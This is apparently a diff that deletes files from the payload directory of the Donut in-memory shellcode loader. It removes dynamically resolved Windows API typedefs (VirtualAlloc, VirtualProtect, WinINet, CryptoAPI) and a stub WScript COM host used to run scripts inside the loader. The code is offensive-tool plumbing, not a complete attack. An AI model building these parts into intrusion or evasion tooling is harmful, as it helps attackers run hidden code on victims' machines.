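-sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
-idx = 0;
-V_VT(&v_type) = VT_I4;
-V_I4(&v_type) = 0x12345678;
-SafeArrayPutElement(sav, &idx, &v_type);
-
-v1.vt = VT_EMPTY;
-VariantClear(&ret);
-
-printf("Press any key to continue...\n");
-getchar();
-
-printf("Calling AllocCoTaskMem\n");
-hr = mi->Invoke_3(
-v1,
-sav, // arguments to method
-&ret); // return value from method
-
-printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
-getchar();
-return;
-*/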
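--- a/payload/winapi.h
+++ b/payload/winapi.h
@@ -1,414 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef WINAPI_H
-#define WINAPI_H
-
-#include <windows.h>
-
-typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
-
-typedef int (WINAPI *MultiByteToWideChar_t)(
-UINT CodePage,
-DWORD dwFlags,
-LPCCH lpMultiByteStr,
-int cbMultiByte,
-LPWSTR lpWideCharStr,
-int cchWideChar);
-
-typedef int (WINAPI *WideCharToMultiByte_t)(
-UINT CodePage,
-DWORD dwFlags,
-LPCWCH lpWideCharStr,
-int cchWideChar,
-LPSTR lpMultiByteStr,
-int cbMultiByte,
-LPCCH lpDefaultChar,
-LPBOOL lpUsedDefaultChar);
-
-// imports from shlwapi.dll
-typedef LSTATUS (WINAPI *SHGetValueA_t)(
-HKEY hkey,
-LPCSTR pszSubKey,
-LPCSTR pszValue,
-DWORD *pdwType,
-void *pvData,
-DWORD *pcbData);
-
-// imports from mscoree.dll
-typedef HRESULT (WINAPI *CLRCreateInstance_t)(
-REFCLSID clsid,
-REFIID riid,
-LPVOID *ppInterface);
-
-typedef HRESULT (WINAPI *CorBindToRuntime_t) (
-LPCWSTR pwszVersion,
-LPCWSTR pwszBuildFlavor,
-REFCLSID rclsid,
-REFIID riid,
-LPVOID FAR *ppv);
-
-// imports from ole32.dll
-typedef HRESULT (WINAPI *CoInitializeEx_t)(
-LPVOID pvReserved,
-DWORD dwCoInit);
-
-typedef void (WINAPI *CoUninitialize_t)(void);
-
-typedef HRESULT (WINAPI *CoCreateInstance_t)(
-REFCLSID rclsid,
-LPUNKNOWN pUnkOuter,
-DWORD dwClsContext,
-REFIID riid,
-LPVOID *ppv);
-
-typedef HRESULT (WINAPI *CreateStdDispatch_t)(
-IUnknown *punkOuter,
-void *pvThis,
-ITypeInfo *ptinfo,
-IUnknown **ppunkStdDisp);
-
-typedef HRESULT (WINAPI *CreateErrorInfo_t)(
-ICreateErrorInfo **pperrinfo);
-
-typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
-INTERFACEDATA *pidata,
-LCID lcid,
-ITypeInfo **pptinfo);
-
-typedef HRESULT (WINAPI *GetErrorInfo_t)(
-ULONG dwReserved,
-IErrorInfo **pperrinfo);
-
-typedef HRESULT (WINAPI *LoadTypeLib_t)(
-LPCOLESTR szFile,
-ITypeLib **pptlib);
-
-typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
-LPCOLESTR szFile,
-REGKIND regkind,
-ITypeLib **pptlib);
-
-typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
-
-// imports from oleaut32.dll
-typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
-SAFEARRAY *psa,
-UINT nDim,
-LONG *plLbound);
-
-typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
-SAFEARRAY *psa,
-UINT nDim,
-LONG *plUbound);
-
-typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
-VARTYPE vt,
-UINT cDims,
-SAFEARRAYBOUND *rgsabound);
-
-typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
-VARTYPE vt,
-LONG lLbound,
-ULONG cElements);
-
-typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
-SAFEARRAY *psa,
-LONG *rgIndices,
-void *pv);
-
-typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
-SAFEARRAY *psa);
-
-typedef BSTR (WINAPI *SysAllocString_t)(
-const OLECHAR *psz);
-
-typedef void (WINAPI *SysFreeString_t)(
-BSTR bstrString);
-
-// imports from kernel32.dll
-typedef HMODULE (WINAPI *LoadLibraryA_t)(
-LPCSTR lpLibFileName);
-
-typedef FARPROC (WINAPI *GetProcAddress_t)(
-HMODULE hModule,
-LPCSTR lpProcName);
-
-typedef BOOL (WINAPI *AllocConsole_t)(void);
-
-typedef BOOL (WINAPI *AttachConsole_t)(
-DWORD dwProcessId);
-
-typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
-PHANDLER_ROUTINE HandlerRoutine,
-BOOL Add);
-
-typedef HANDLE (WINAPI *GetStdHandle_t)(
-DWORD nStdHandle);
-
-typedef BOOL (WINAPI *SetStdHandle_t)(
-DWORD nStdHandle,
-HANDLE hHandle);
-
-typedef HANDLE (WINAPI *CreateFileA_t)(
-LPCSTR lpFileName,
-DWORD dwDesiredAccess,
-DWORD dwShareMode,
-LPSECURITY_ATTRIBUTES lpSecurityAttributes,
-DWORD dwCreationDisposition,
-DWORD dwFlagsAndAttributes,
-HANDLE hTemplateFile);
-
-typedef HANDLE (WINAPI *CreateEventA_t)(
-LPSECURITY_ATTRIBUTES lpEventAttributes,
-BOOL bManualReset,
-BOOL bInitialState,
-LPCSTR lpName);
-
-typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
-
-typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
-
-typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
-
-typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
-
-typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
-int idHook,
-HOOKPROC lpfn,
-HINSTANCE hmod,
-DWORD dwThreadId);
-
-typedef BOOL (WINAPI *CreateProcessA_t)(
-LPCSTR lpApplicationName,
-LPSTR lpCommandLine,
-LPSECURITY_ATTRIBUTES lpProcessAttributes,
-LPSECURITY_ATTRIBUTES lpThreadAttributes,
-BOOL bInheritHandles,
-DWORD dwCreationFlags,
-LPVOID lpEnvironment,
-LPCSTR lpCurrentDirectory,
-LPSTARTUPINFOA lpStartupInfo,
-LPPROCESS_INFORMATION lpProcessInformation);
-
-typedef DWORD (WINAPI *WaitForSingleObject_t)(
-HANDLE hHandle,
-DWORD dwMilliseconds);
-
-// imports from wininet.dll
-typedef BOOL (WINAPI *InternetCrackUrl_t)(
-LPCSTR lpszUrl,
-DWORD dwUrlLength,
-DWORD dwFlags,
-LPURL_COMPONENTS lpUrlComponents);
-
-typedef HINTERNET (WINAPI *InternetOpen_t)(
-LPCSTR lpszAgent,
-DWORD dwAccessType,
-LPCSTR lpszProxy,
-LPCSTR lpszProxyBypass,
-DWORD dwFlags);
-
-typedef HINTERNET (WINAPI *InternetConnect_t)(
-HINTERNET hInternet,
-LPCSTR lpszServerName,
-INTERNET_PORT nServerPort,
-LPCSTR lpszUserName,
-LPCSTR lpszPassword,
-DWORD dwService,
-DWORD dwFlags,
-DWORD_PTR dwContext);
-
-typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
-HINTERNET hConnect,
-LPCSTR lpszVerb,
-LPCSTR lpszObjectName,
-LPCSTR lpszVersion,
-LPCSTR lpszReferrer,
-LPCSTR *lplpszAcceptTypes,
-DWORD dwFlags,
-DWORD_PTR dwContext);
-
-typedef BOOL (WINAPI *InternetSetOption_t)(
-HINTERNET hInternet,
-DWORD dwOption,
-LPVOID lpBuffer,
-DWORD dwBufferLength);
-
-typedef BOOL (WINAPI *HttpSendRequest_t)(
-HINTERNET hRequest,
-LPCSTR lpszHeaders,
-DWORD dwHeadersLength,
-LPVOID lpOptional,
-DWORD dwOptionalLength);
-
-typedef BOOL (WINAPI *HttpQueryInfo_t)(
-HINTERNET hRequest,
-DWORD dwInfoLevel,
-LPVOID lpBuffer,
-LPDWORD lpdwBufferLength,
-LPDWORD lpdwIndex);
-
-typedef BOOL (WINAPI *InternetReadFile_t)(
-HINTERNET hFile,
-LPVOID lpBuffer,
-DWORD dwNumberOfBytesToRead,
-LPDWORD lpdwNumberOfBytesRead);
-
-typedef BOOL (WINAPI *InternetCloseHandle_t)(
-HINTERNET hInternet);
-
-typedef BOOL (WINAPI *CryptAcquireContext_t)(
-HCRYPTPROV *phProv,
-LPCSTR szContainer,
-LPCSTR szProvider,
-DWORD dwProvType,
-DWORD dwFlags);
-
-typedef void (WINAPI *GetSystemInfo_t)(
-LPSYSTEM_INFO lpSystemInfo);
-
-typedef SIZE_T (WINAPI *VirtualQuery_t)(
-LPCVOID lpAddress,
-PMEMORY_BASIC_INFORMATION lpBuffer,
-SIZE_T dwLength);
-
-typedef BOOL (WINAPI *VirtualProtect_t)(
-LPVOID lpAddress,
-SIZE_T dwSize,
-DWORD flNewProtect,
-PDWORD lpflOldProtect);
-
-typedef HMODULE (WINAPI *GetModuleHandleA_t)(
-LPCSTR lpModuleName);
-
-typedef HMODULE (WINAPI *LoadLibraryExA_t)(
-LPCSTR lpLibFileName,
-HANDLE hFile,
-DWORD dwFlags);
-
-typedef HMODULE (WINAPI *LoadLibraryExW_t)(
-LPCWSTR lpLibFileName,
-HANDLE hFile,
-DWORD dwFlags);
-
-typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
-LPCSTR pszString,
-DWORD cchString,
-DWORD dwFlags,
-BYTE *pbBinary,
-DWORD *pcbBinary,
-DWORD *pdwSkip,
-DWORD *pdwFlags);
-
-typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
-DWORD dwCertEncodingType,
-LPCSTR lpszStructType,
-const BYTE *pbEncoded,
-DWORD cbEncoded,
-DWORD dwFlags,
-PCRYPT_DECODE_PARA pDecodePara,
-void *pvStructInfo,
-DWORD *pcbStructInfo);
-
-typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
-HCRYPTPROV hCryptProv,
-DWORD dwCertEncodingType,
-PCERT_PUBLIC_KEY_INFO pInfo,
-HCRYPTKEY *phKey);
-
-typedef BOOL (WINAPI *CryptCreateHash_t)(
-HCRYPTPROV hProv,
-ALG_ID Algid,
-HCRYPTKEY hKey,
-DWORD dwFlags,
-HCRYPTHASH *phHash);
-
-typedef BOOL (WINAPI *CryptHashData_t)(
-HCRYPTHASH hHash,
-const BYTE *pbData,
-DWORD dwDataLen,
-DWORD dwFlags);
-
-typedef BOOL (WINAPI *CryptVerifySignature_t)(
-HCRYPTHASH hHash,
-const BYTE *pbSignature,
-DWORD dwSigLen,
-HCRYPTKEY hPubKey,
-LPCSTR szDescription,
-DWORD dwFlags);
-
-typedef BOOL (WINAPI *CryptDestroyHash_t)(
-HCRYPTHASH hHash);
-
-typedef BOOL (WINAPI *CryptDestroyKey_t)(
-HCRYPTKEY hKey);
-
-typedef BOOL (WINAPI *CryptReleaseContext_t)(
-HCRYPTPROV hProv,
-DWORD dwFlags);
-
-typedef LPVOID (WINAPI *VirtualAlloc_t)(
-LPVOID lpAddress,
-SIZE_T dwSize,
-DWORD flAllocationType,
-DWORD flProtect);
-
-typedef BOOL (WINAPI *VirtualFree_t)(
-LPVOID lpAddress,
-SIZE_T dwSize,
-DWORD dwFreeType);
-
-typedef HLOCAL (WINAPI *LocalFree_t)(
-HLOCAL hMem);
-
-typedef HRSRC (WINAPI *FindResource_t)(
-HMODULE hModule,
-LPCSTR lpName,
-LPCSTR lpType);
-
-typedef HGLOBAL (WINAPI *LoadResource_t)(
-HMODULE hModule,
-HRSRC hResInfo);
-
-typedef LPVOID (WINAPI *LockResource_t)(
-HGLOBAL hResData);
-
-typedef DWORD (WINAPI *SizeofResource_t)(
-HMODULE hModule,
-HRSRC hResInfo);
-
-typedef void (WINAPI *RtlZeroMemory_t)(
-LPVOID Destination,
-SIZE_T Length);
-#endif
-
-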
+0
-341
payload/wscript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34
35 // IUnknown interface
36 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
37 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
38 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
39
40 // IDispatch interface
41 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
42 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
43 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
44 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
45
46 // IHost interface
47 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
48 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
49 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
50 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
51 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
52 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
53 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
54 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
55 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
56 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
57 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
58 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
59 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
60 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
61 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
62 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
63 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
64 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
65 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
66 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
67 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
68 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
69 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
70
71 host->m_cRef = 0;
72 host->inst = inst;
73
74 DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
75 hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);
76
77 if(hr == S_OK) {
78 DPRINT("ITypeLib::GetTypeInfoOfGuid");
79
80 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
81 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
82 }
83 DPRINT("HRESULT : %08lx", hr);
84 return hr;
85 }
86
87 // Queries a COM object for a pointer to one of its interface.
88 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
89 DPRINT("WScript::QueryInterface");
90
91 if(ppv == NULL) return E_POINTER;
92
93 // we implement the following interfaces
94 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
95 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
96 IsEqualIID(&iface->inst->xIID_IHost, riid))
97 {
98 *ppv = iface;
99 return S_OK;
100 }
101 *ppv = NULL;
102 return E_NOINTERFACE;
103 }
104
105 // Increments the reference count for an interface pointer to a COM object.
106 static ULONG WINAPI Host_AddRef(IHost *iface) {
107 DPRINT("WScript::AddRef");
108
109 _InterlockedIncrement(&iface->m_cRef);
110 return iface->m_cRef;
111 }
112
113 // Decrements the reference count for an interface on a COM object.
114 static ULONG WINAPI Host_Release(IHost *iface) {
115 DPRINT("WScript::Release");
116
117 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
118 return ref;
119 }
120
121 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
122 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
123 DPRINT("WScript::GetTypeInfoCount");
124
125 if(pctinfo == NULL) return E_POINTER;
126
127 *pctinfo = 1;
128 return S_OK;
129 }
130
131 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
132 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
133 DPRINT("WScript::GetTypeInfo");
134
135 if(ppTInfo == NULL) return E_POINTER;
136
137 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
138 *ppTInfo = iface->lpTypeInfo;
139
140 return S_OK;
141 }
142
143 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
144 // which can be used on subsequent calls to Invoke.
145 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
146 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
147 DPRINT("WScript::GetIDsOfNames");
148
149 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
150 }
151
152 // Provides access to properties and methods exposed by an object.
153 // The dispatch function DispInvoke provides a standard implementation of Invoke.
154 static HRESULT WINAPI Host_Invoke(
155 IHost *iface, DISPID dispIdMember, REFIID riid,
156 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
157 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
158
159 DPRINT("WScript::Invoke");
160
161 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
162 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
163 pVarResult, pExcepInfo, puArgErr);
164
165 DPRINT("HRESULT : %08lx", hr);
166
167 return hr;
168 }
169
170 // Returns the name of the WScript object (the host executable file).
171 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
172 DPRINT("WScript::Name");
173
174 return S_OK;
175 }
176
177 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
178 DPRINT("WScript::Application");
179
180 return E_NOTIMPL;
181 }
182
183 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
184 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
185 DPRINT("WScript::FullName");
186
187 return E_NOTIMPL;
188 }
189
190 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
191 DPRINT("WScript::Path");
192
193 return E_NOTIMPL;
194 }
195
196 // Gets the script mode, or identifies the script mode.
197 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
198 DPRINT("WScript::get_Interactive");
199
200 return E_NOTIMPL;
201 }
202
203 // Sets the script mode, or identifies the script mode.
204 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
205 DPRINT("WScript::put_Interactive");
206
207 return E_NOTIMPL;
208 }
209
210 // Forces script execution to stop at any time.
211 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
212 DPRINT("WScript::Quit(%i)", ExitCode);
213
214 // if you know of a better way to do this..let me know.
215 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
216
217 return S_OK;
218 }
219
220 // Returns the file name of the currently running script.
221 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
222 DPRINT("WScript::ScriptName");
223
224 return E_NOTIMPL;
225 }
226
227 // Returns the full path of the currently running script.
228 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
229 DPRINT("WScript::ScriptFullName");
230
231 return E_NOTIMPL;
232 }
233
234 // Returns the WshArguments object (a collection of arguments).
235 static HRESULT WINAPI Host_get_Arguments(
236 IHost *iface, void **out_Arguments) { // IArguments2
237 DPRINT("WScript::Arguments");
238
239 return E_NOTIMPL;
240 }
241
242 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
243 DPRINT("WScript::Version");
244
245 return E_NOTIMPL;
246 }
247
248 // Returns the Windows Script Host build version number.
249 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
250 DPRINT("WScript::BuildVersion");
251
252 return E_NOTIMPL;
253 }
254
255 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
256 DPRINT("WScript::get_Timeout");
257
258 return E_NOTIMPL;
259 }
260
261 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
262 DPRINT("WScript::put_Timeout");
263
264 return E_NOTIMPL;
265 }
266
267 // Connects the object's event sources to functions with a given prefix.
268 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
269 IDispatch **out_Dispatch) {
270 DPRINT("WScript::CreateObject");
271
272 return E_NOTIMPL;
273 }
274
275 // Outputs text to either a message box or the command console window.
276 static HRESULT WINAPI Host_Echo(
277 IHost *iface, SAFEARRAY *args) {
278 DPRINT("WScript::Echo");
279
280 return E_NOTIMPL;
281 }
282
283 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
284 static HRESULT WINAPI Host_GetObject(
285 IHost *iface, BSTR Pathname, BSTR ProgID,
286 BSTR Prefix, IDispatch **out_Dispatch) {
287 DPRINT("WScript::GetObject");
288
289 return E_NOTIMPL;
290 }
291
292 // Disconnects a connected object's event sources.
293 static HRESULT WINAPI Host_DisconnectObject(
294 IHost *iface, IDispatch *Object) {
295 DPRINT("WScript::DisconnectObject");
296
297 return E_NOTIMPL;
298 }
299
300 // Suspends script execution for a specified length of time, then continues execution.
301 static HRESULT WINAPI Host_Sleep(
302 IHost *iface, LONG Time) {
303
304 DPRINT("WScript::Sleep");
305 iface->inst->api.Sleep((DWORD)Time);
306
307 return S_OK;
308 }
309
310 // Connects the object's event sources to functions with a given prefix.
311 static HRESULT WINAPI Host_ConnectObject(
312 IHost *iface, IDispatch *Object, BSTR Prefix) {
313 DPRINT("WScript::ConnectObject");
314
315 return E_NOTIMPL;
316 }
317
318 // Exposes the read-only input stream for the current script.
319 static HRESULT WINAPI Host_get_StdIn(
320 IHost *iface, void **ppts) { // ppts is ITextStream
321 DPRINT("WScript::StdIn");
322
323 return E_NOTIMPL;
324 }
325
326 // Exposes the write-only output stream for the current script.
327 static HRESULT WINAPI Host_get_StdOut(
328 IHost *iface, void **ppts) { // ppts is ITextStream
329 DPRINT("WScript::StdOut");
330
331 return E_NOTIMPL;
332 }
333
334 // Exposes the write-only error output stream for the current script.
335 static HRESULT WINAPI Host_get_StdErr(
336 IHost *iface, void **ppts) { // ppts is ITextStream
337 DPRINT("WScript::StdErr");
338
339 return E_NOTIMPL;
340 }
+0
-284
payload/wscript.h
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
